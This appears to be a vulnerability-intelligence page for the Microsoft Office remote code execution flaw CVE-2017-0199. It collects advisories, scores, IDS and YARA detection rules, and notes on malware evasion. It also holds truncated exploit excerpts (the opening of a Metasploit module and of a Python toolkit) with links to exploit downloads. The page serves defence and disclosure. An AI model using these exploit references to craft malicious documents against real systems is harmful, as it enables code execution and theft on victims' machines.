CVE-2017-0199
published 2017-04-12CVE-2017-0199: Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2…
PriorityP195high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.93%
100.0th percentile
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | windows_server_2008 | — | — |
| microsoft_corporation | office_wordpad | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
| msrc | windows_vista_service_pack_2 | — | — |
| msrc | windows_vista_x64_edition_service_pack_2 | — | — |
| philips | intellispace_portal | — | — |
| philips | intellispace_portal | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →CVE-2017-0199 exploitation begins with an OLE-format Excel/Office document containing an embedded OLE hyperlink that auto-opens to download a remote RTF document; detect documents with embedded OLE hyperlinks that auto-execute on open. ↗
- →The RTF exploit uses the \objupdate control word to force the embedded OLE object to execute before display, without requiring user interaction with the object. Scan RTF files for \objupdate combined with Equation Editor OLE objects. ↗
- →The embedded OLE object class name in malicious RTF files exploiting CVE-2017-11882 (chained after CVE-2017-0199) is 'EQuATioN.3'; use rtfdump/rtfobj to extract and inspect OLE class names in RTF documents. ↗
- →Agent Tesla anti-analysis checks include: CheckRemoteDebuggerPresent(), tick-count delta after 10ms sleep, presence of SbieDLL.dll/SxIn.dll/Sf2.dll/snxhk.dll/cmdvrt32.dll, WMI queries for 'Manufacturer'/'Model'/'Name' of video controller matching VMware/VirtualBox/VBox/VIRTUAL keywords, and HTTP GET to ip-api.com/line/?fields=hosting. ↗
- →Process hollowing is performed into AddInProcess32 (launched with CREATE_SUSPENDED flag 0x80000004); monitor for AddInProcess32.exe being spawned by PowerShell or unusual parent processes, especially with suspended creation flags. ↗
- →A malicious Word document exploiting CVE-2017-0199 was observed in the RedAlpha campaign targeting Tibetan communities; the sample was first seen in the wild during the 57-day CNNVD publication lag window. ↗
- ·The Agent Tesla loader-module is fileless — it is loaded directly into PowerShell memory and never written to disk, making file-based detection ineffective for this stage. ↗
- ·The malicious RTF file exploiting CVE-2017-0199/CVE-2017-11882 was heavily obfuscated with random MTEF header field values (except the MTEF version field, which must be 2 or 3), causing near-zero AV detection at time of analysis. ↗
- ·The JavaScript downloader (morningdatingroses.js) uses a reversed URL string reassembled at runtime via .split('').reverse().join(''), evading static string-based detection of the C2 URL. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa7.8HIGH
vendor_msrc6.7MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Office and WordPad Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 7.8
CVE-2017-0199 [HIGH] Microsoft Office and WordPad Remote Code Execution Vulnerability
Vulnerability: Microsoft Office and WordPad Remote Code Execution Vulnerability
Affected: Microsoft Office and WordPad
Microsoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-0199
Remediation Due Date: 2022-05-03
Microsoft
Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows
vendor_msrc·2017-04-11·CVSS 6.7
CVE-2017-0199 [HIGH] Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows
Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows
Description: A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
Exploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.
The update addresses the vulnerability by correcting th
GHSA
GHSA-mrf9-75pc-cjmm: Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 20
ghsa_unreviewed·2022-05-13
CVE-2017-0199 [HIGH] GHSA-mrf9-75pc-cjmm: Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 20
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."
VulnCheck
Microsoft Office and WordPad Remote Code Execution Vulnerability
vulncheck·2017·CVSS 7.8
CVE-2017-0199 [HIGH] Microsoft Office and WordPad Remote Code Execution Vulnerability
Microsoft Office and WordPad Remote Code Execution Vulnerability
Microsoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for remote code execution.
Affected: Microsoft Office and WordPad
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability; https://www.malware-traffic-analysis.net/2017/04/27/index.html; https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts; https://blog.checkpoint.com/research/brokers-shadows-analyzing-v
VulnCheck
Adobe Flash Player Arbitrary Code Execution Vulnerability
vulncheck·2016·CVSS 9.8
CVE-2016-4117 [CRITICAL] Adobe Flash Player Arbitrary Code Execution Vulnerability
Adobe Flash Player Arbitrary Code Execution Vulnerability
An access of resource using incompatible type vulnerability exists within Adobe Flash Player that allows an attacker to perform remote code execution.
Affected: Adobe Flash Player
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.cve.org/CVERecord?id=CVE-2016-4117; https://security.berkeley.edu/news/vulnerable-adobe-flash-player-allows-remote-code-execution-cve-2016-4117; https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/; https://securelist.com/operation-daybreak/75100/; https://ww
VulnCheck
Microsoft Office Memory Corruption Vulnerability
vulncheck·2015·CVSS 7.8
CVE-2015-1641 [HIGH] CWE-399 Microsoft Office Memory Corruption Vulnerability
Microsoft Office Memory Corruption Vulnerability
Microsoft Office contains a memory corruption vulnerability due to failure to properly handle rich text format files in memory. Successful exploitation allows for remote code execution in the context of the current user.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.sekoia.fr/blog/ms-office-exploit-analysis-cve-2015-1641/; https://unit42.paloaltonetworks.com/unit42-new-sofacy-attacks-against-us-government-agency/; https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=09308982
VulnCheck
Microsoft Office Malformed EPS File Vulnerability
vulncheck·2015·CVSS 7.8
CVE-2015-2545 [HIGH] CWE-20 Microsoft Office Malformed EPS File Vulnerability
Microsoft Office Malformed EPS File Vulnerability
Microsoft Office allows remote attackers to execute arbitrary code via a crafted EPS image.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html; http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf; https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/; https://securelist.com/cve-2015-2545-overview-of-current-threats/74828/; https://www.proofpoi
VulnCheck
Microsoft Office Buffer Overflow Vulnerability
vulncheck·2013·CVSS 7.8
CVE-2013-1331 [HIGH] CWE-119 Microsoft Office Buffer Overflow Vulnerability
Microsoft Office Buffer Overflow Vulnerability
Microsoft Office contains a buffer overflow vulnerability that allows remote attackers to execute code via crafted PNG data in an Office document.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf; https://dl.acm.org/doi/pdf/10.1145/3465481.3465758; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/an-inside-look-at-cve-2017-0199-hta-and-scriptlet-file-handler-vulnerability
Remediation Due: 2022-06-22
VulnCheck
Microsoft MSCOMCTL.OCX Remote Code Execution Vulnerability
vulncheck·2012·CVSS 8.8
CVE-2012-0158 [HIGH] CWE-94 Microsoft MSCOMCTL.OCX Remote Code Execution Vulnerability
Microsoft MSCOMCTL.OCX Remote Code Execution Vulnerability
Microsoft MSCOMCTL.OCX contains an unspecified vulnerability that allows for remote code execution, allowing an attacker to take complete control of an affected system under the context of the current user.
Affected: Microsoft MSCOMCTL.OCX
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://web.archive.org/web/20120907091804/http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf; https://www.cve.org/CVERecord?id=CVE-2012-0158; https://cybersecurity.att.com/blogs/labs-research/msupdater-trojan-found-using-cve-2012-0158-space-and-missile-defense-conference; https://securelist.com/red-october-diplomati
Suricata
ET MALWARE HTTP Andromeda File Request
suricata·2017-07-21
CVE-2017-0199 ET MALWARE HTTP Andromeda File Request
ET MALWARE HTTP Andromeda File Request
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE HTTP Andromeda File Request"; flow:established,to_server; http.uri; content:"myguy"; fast_pattern; pcre:"/myguy\.(?:xls(?:\.hta)?|exe)$/"; reference:url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference:cve,2017-0199; classtype:trojan-activity; sid:2024490; rev:5; metadata:created_at 2017_07_21, cve CVE_2017_0199, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_10_09;)
Suricata
ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
suricata·2017-07-07·CVSS 7.8
CVE-2017-0199 [HIGH] ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl"; flow:established,to_server; http.uri; content:".hta"; nocase; fast_pattern; pcre:"/\.hta(?:[?&]|$)/i"; http.user_agent; content:"Mozilla/4.0 (compatible|3b 20|MSIE 7.0|3b|"; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"cookie|0d 0a|"; reference:md5,66a42e338e32fb6c02c9d4c56760d89d; classtype:attempted-user; sid:2024449; rev:7; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_07_07, cve CVE_2017_0199, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV
Suricata
ET EXPLOIT Suspicious FTP RETR to .hta file possible exploit (CVE-2017-0199)
suricata·2017-06-29·CVSS 7.8
CVE-2017-0199 [HIGH] ET EXPLOIT Suspicious FTP RETR to .hta file possible exploit (CVE-2017-0199)
ET EXPLOIT Suspicious FTP RETR to .hta file possible exploit (CVE-2017-0199)
Rule: alert tcp $HOME_NET any -> $EXTERNAL_NET 21 (msg:"ET EXPLOIT Suspicious FTP RETR to .hta file possible exploit (CVE-2017-0199)"; flow:established,to_server; content:"|2e|hta|0d 0a|"; nocase; fast_pattern; content:"RETR "; pcre:"/^[^\r\n]+\.hta\r?\n/Ri"; classtype:bad-unknown; sid:2024434; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product MS_Office, attack_target Client_Endpoint, created_at 2017_06_29, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag possible_exploitation, tag CISA_KEV, updated_at 2019_10_08;)
Suricata
ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL
suricata·2017-06-19·CVSS 7.8
CVE-2017-0199 [HIGH] ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL
ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL"; flow:established,to_client; file.data; content:"|7b 5c 72 74|"; within:4; content:!"|66|"; within:1; content:"|5C 6F 62 6A 61 75 74 6C 69 6E 6B|"; nocase; distance:0; reference:md5,8168b2305289ecc778216405d1fd7984; reference:cve,2017-0199; classtype:trojan-activity; sid:2024413; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_06_19, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_14;)
Suricata
ET WEB_CLIENT Office Requesting .HTA File Likely CVE-2017-0199 Request
suricata·2017-04-19·CVSS 7.8
CVE-2017-0199 [HIGH] ET WEB_CLIENT Office Requesting .HTA File Likely CVE-2017-0199 Request
ET WEB_CLIENT Office Requesting .HTA File Likely CVE-2017-0199 Request
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_CLIENT Office Requesting .HTA File Likely CVE-2017-0199 Request"; flow:established,to_server; http.uri; content:".hta"; nocase; fast_pattern; http.user_agent; content:"Microsoft Office"; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,2017-0199; classtype:trojan-activity; sid:2024224; rev:5; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2017_04_19, cve CVE_2017_0199, deployment Perimeter, malware_family Exploit_Kit_RIG, performance_impact Low, confidence Medium, signature_severity Major, tag Exploit_kit_RIG, ta
Suricata
ET WEB_CLIENT Office UA FB SET
suricata·2017-04-19
CVE-2017-0199 ET WEB_CLIENT Office UA FB SET
ET WEB_CLIENT Office UA FB SET
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_CLIENT Office UA FB SET"; flow:established,to_server; flowbits:set,Office.UA; flowbits:noalert; http.user_agent; content:"Microsoft Office"; fast_pattern; startswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:cve,cve-2017-0199; classtype:trojan-activity; sid:2024225; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2017_04_19, deployment Perimeter, malware_family Exploit_Kit_RIG, performance_impact Low, signature_severity Major, tag Exploit_kit_RIG, updated_at 2024_04_20;)
Suricata
ET WEB_CLIENT Office Discovery HTA file Likely CVE-2017-0199 Request M2
suricata·2017-04-19·CVSS 7.8
CVE-2017-0199 [HIGH] ET WEB_CLIENT Office Discovery HTA file Likely CVE-2017-0199 Request M2
ET WEB_CLIENT Office Discovery HTA file Likely CVE-2017-0199 Request M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Office Discovery HTA file Likely CVE-2017-0199 Request M2"; flow:established,to_client; flowbits:isset,Office.UA; http.content_type; content:"application/hta"; nocase; endswith; fast_pattern; reference:cve,cve-2017-0199; classtype:trojan-activity; sid:2024226; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2017_04_19, deployment Perimeter, malware_family Exploit_Kit_RIG, performance_impact Low, confidence Medium, signature_severity Major, tag Exploit_kit_RIG, tag CISA_KEV, updated_at 2020_10_09;)
Suricata
ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
suricata·2017-04-11·CVSS 7.8
CVE-2017-0199 [HIGH] ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)"; flow:established,to_client; flowbits:isset,et.IE7.NoRef.NoCookie; http.content_type; bsize:15; content:"application/hta"; fast_pattern; nocase; classtype:trojan-activity; sid:2024197; rev:8; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_04_11, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, signature_severity Major, tag CISA_KEV, updated_at 2024_03_27;)
Suricata
ET EXPLOIT Possible CVE-2017-0199 HTA Inbound
suricata·2017-04-10·CVSS 7.8
CVE-2017-0199 [HIGH] ET EXPLOIT Possible CVE-2017-0199 HTA Inbound
ET EXPLOIT Possible CVE-2017-0199 HTA Inbound
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2017-0199 HTA Inbound"; flow:established,to_client; flowbits:isset,et.IE7.NoRef.NoCookie; http.content_type; bsize:15; content:"application/hta"; fast_pattern; file.data; content:"|7b 5c 72 74|"; distance:1; content:"|7b 5c|"; distance:0; content:"|7b 5c|"; distance:0; classtype:trojan-activity; sid:2024192; rev:6; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product MS_Office, attack_target Client_Endpoint, created_at 2017_04_10, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_27;)
Suricata
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
suricata·2017-04-10·CVSS 7.8
CVE-2017-0199 [HIGH] ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199"; flow:established,to_client; flowbits:isset,et.http.hta; file.data; content:"Wscript.Shell"; nocase; reference:url,www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html; reference:url,securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/; classtype:attempted-user; sid:2024196; rev:4; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_04_10, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, signature_severity Major, tag CISA_KEV, updated_at 2024_04_0
Suricata
ET EXPLOIT Possible CVE-2017-0199 HTA Inbound M2
suricata·2017-04-10·CVSS 7.8
CVE-2017-0199 [HIGH] ET EXPLOIT Possible CVE-2017-0199 HTA Inbound M2
ET EXPLOIT Possible CVE-2017-0199 HTA Inbound M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2017-0199 HTA Inbound M2"; flow:established,to_client; http.content_type; bsize:15; content:"application/hta"; file.data; content:"|2e 65 78 70 61 6e 64 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 28 22 25 41 50 50 44 41 54 41 25 22 29 20|"; fast_pattern; content:"|4d 65 6e 75 5c 50 72 6f 67 72 61 6d 73 5c 53 74 61 72 74 75 70 5c|"; classtype:trojan-activity; sid:2024193; rev:6; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product MS_Office, attack_target Client_Endpoint, created_at 2017_04_10, cve CVE_2017_0199, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, up
YARA
rtf_objdata_urlmoniker_http
yara
CVE-2017-0199 rtf_objdata_urlmoniker_http
rule rtf_objdata_urlmoniker_http {
meta:
ref = "https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/"
strings:
$header = "{\\rtf1"
$objdata = "objdata 0105000002000000" nocase
$urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
$http = "68007400740070003a002f002f00" nocase
condition:
$header at 0 and $objdata and $urlmoniker and $http
}
Exploit-DB
Microsoft Office - 'Composite Moniker Remote Code Execution
exploitdb·2018-01-09·CVSS 7.8
CVE-2017-8570 [HIGH] Microsoft Office - 'Composite Moniker Remote Code Execution
Microsoft Office - 'Composite Moniker Remote Code Execution
---
## What?
This repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the "Composite Moniker" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44263.zip
## Why?
A few reasons.
1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.
2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the "Scrip
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it´s possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
exploitdb·2017-04-25
CVE-2017-0199 Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec
Exploit-DB
Microsoft Word - '.RTF' Remote Code Execution
exploitdb·2017-04-18·CVSS 7.8
CVE-2017-0199 [HIGH] Microsoft Word - '.RTF' Remote Code Execution
Microsoft Word - '.RTF' Remote Code Execution
---
#!/usr/bin/env python
'''
## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ##
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41894.zip
'''
import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile
from random import randint
from random import choice
from string import ascii_uppercase
from zipfile import ZipFile, ZIP_STORED, ZipInfo
BACKLOG = 50 # how many pending connections queue will hold
MAX_DATA_RECV = 999999 # max number of bytes we receive at once
DEBUG = True # set to True to see the debug msgs
def main(argv):
# Host and Port information
global port
global host
global filename
global docuri
global payloadurl
global payloadlocation
global custom
Metasploit
Microsoft Office Word Malicious Hta Execution
metasploit
Microsoft Office Word Malicious Hta Execution
Microsoft Office Word Malicious Hta Execution
This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Securelist
Exploits and vulnerabilities in Q1 2026
blogs_securelist·2026-05-07·CVSS 7.8
CVE-2026-21519 [HIGH] Exploits and vulnerabilities in Q1 2026
Alexander Kolesnikov
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
CVE-2026-21519: Desktop Window Manager vulnerability
RegPwn (CVE-2026-21533): a system settings access control vulnerability
CVE-2026-21514: a Microsoft Office vulnerability
Clawdbot (CVE-2026-25253): an OpenClaw vulnerability
CVE-2026-34070: LangChain framework vulnerability
CVE-2026-22812: an OpenCode vulnerability
Conclusion and advice
Authors
Alexander Kolesnikov
During Q1 2026, the exploit kits leveraged by threat actors to target user systems expanded once again, incorporating new exploits for the Microsoft Off
Securelist
Vulnerability landscape in Q4 2025
blogs_securelist·2026-03-06
Vulnerability landscape in Q4 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Notable vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately.
In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025.
## Statistics on registered vulnerabilities
This section contains statistics on regis
Securelist
Exploits and vulnerabilities in Q4 2025
blogs_securelist·2026-03-06·CVSS 7.8
CVE-2025-55182 [HIGH] Exploits and vulnerabilities in Q4 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
React2Shell (CVE-2025-55182): a vulnerability in React Server Components
CVE-2025-54100: command injection during the execution of curl (Invoke-WebRequest)
CVE-2025-11001: a vulnerability in 7-Zip
RediShell (CVE-2025-49844): a vulnerability in Redis
CVE-2025-24990: a vulnerability in the ltmdm64.sys driver
CVE-2025-59287: a vulnerability in Windows Server Update Services (WSUS)
Conclusion and advice
Authors
Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vul
Securelist
Exploits and vulnerabilities in Q3 2025
blogs_securelist·2025-12-03·CVSS 7.8
CVE-2025-49704 [HIGH] Exploits and vulnerabilities in Q3 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
ToolShell (CVE-2025-49704 and CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771): insecure deserialization and an authentication bypass
CVE-2025-8088: a directory traversal vulnerability in WinRAR
CVE-2025-41244: a privilege escalation vulnerability in VMware Aria Operations and VMware Tools
Conclusion and advice
Authors
Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vuln
Securelist
